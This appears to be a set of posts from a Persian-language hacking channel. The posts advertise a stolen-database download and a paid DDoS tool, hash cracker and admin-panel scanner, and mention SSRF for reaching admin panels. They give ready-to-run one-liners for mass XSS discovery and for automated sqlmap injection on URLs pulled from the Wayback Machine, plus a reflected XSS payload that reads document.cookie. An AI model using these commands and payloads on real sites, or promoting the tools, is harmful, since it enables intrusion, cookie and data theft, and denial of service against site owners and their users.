☠️Intrusion into the database and finding information in the database can download and use the link below.

🌐 Site Address
🤡 Download Database

🙂دسترسی به پنل ادمین - باگ SSRF🙂

🤔 توضحیات:
با استفاده از باگ ssrf میتونید به پنل ادمین دسترسی پیدا کنید و یکی از محبوب باگ برای هکرا در تست نفوذ است.

👾قسمت اول👾

😎ابزار های ما:
🔥Ero-Hash
(شما با استفاده ابزار بالا که در نسخه تقدیم به شما میشه میتونید هش های خودتون رو به صورت تکی یا لیست کرک کنید)
💥DDos Ero
(با استفاده از این ابزار شما میتونید حمله سنگین دیداس رو روی سایت مورد نظرتون پیاده سازی کنید و سایت رو از دسترس خارج کنید)

✨Scan Ero
(با استفاده از ابزار اسکن یرو شما میتونید سایت مورد نظرتون رو اسکن کنید و میتونید بجز اسکن و پیدا کردن ای‌پی و... میتونید پنل ادمین روهم پیدا کنید)

‼️برای دریافت اطلاعات بیشتر و قیمت به ایدی زیر پیام بدید.
📌@GoRunEro

😠یه سرچ انجین جالب که میتونین توش مثل گوگل رایت اپ ها و پیلود ها و .... رو پیدا کنید

Link

#writeup
——————‌
⭐@EroHack
☝️Boost

👺xss oneliner command

echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln

⬇️ Download ( Tools )
🔒 BugCod3 ( ZIP )

#XSS #BugBounty
➖➖➖➖➖➖➖➖➖➖
🌐@EroHack
➡️Boost

SQLMap from Waybackurls ⚰️

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

#sql #sql_injection
——————‌
➡️@EroHack0
🙏Boost

☠️Parameter: invitedby=

Payload=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full_url= https://site. com/?invitedby=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

#XSS #BugBounty
➖➖➖➖➖➖➖➖➖➖
❤️@EroHack
✔️Boost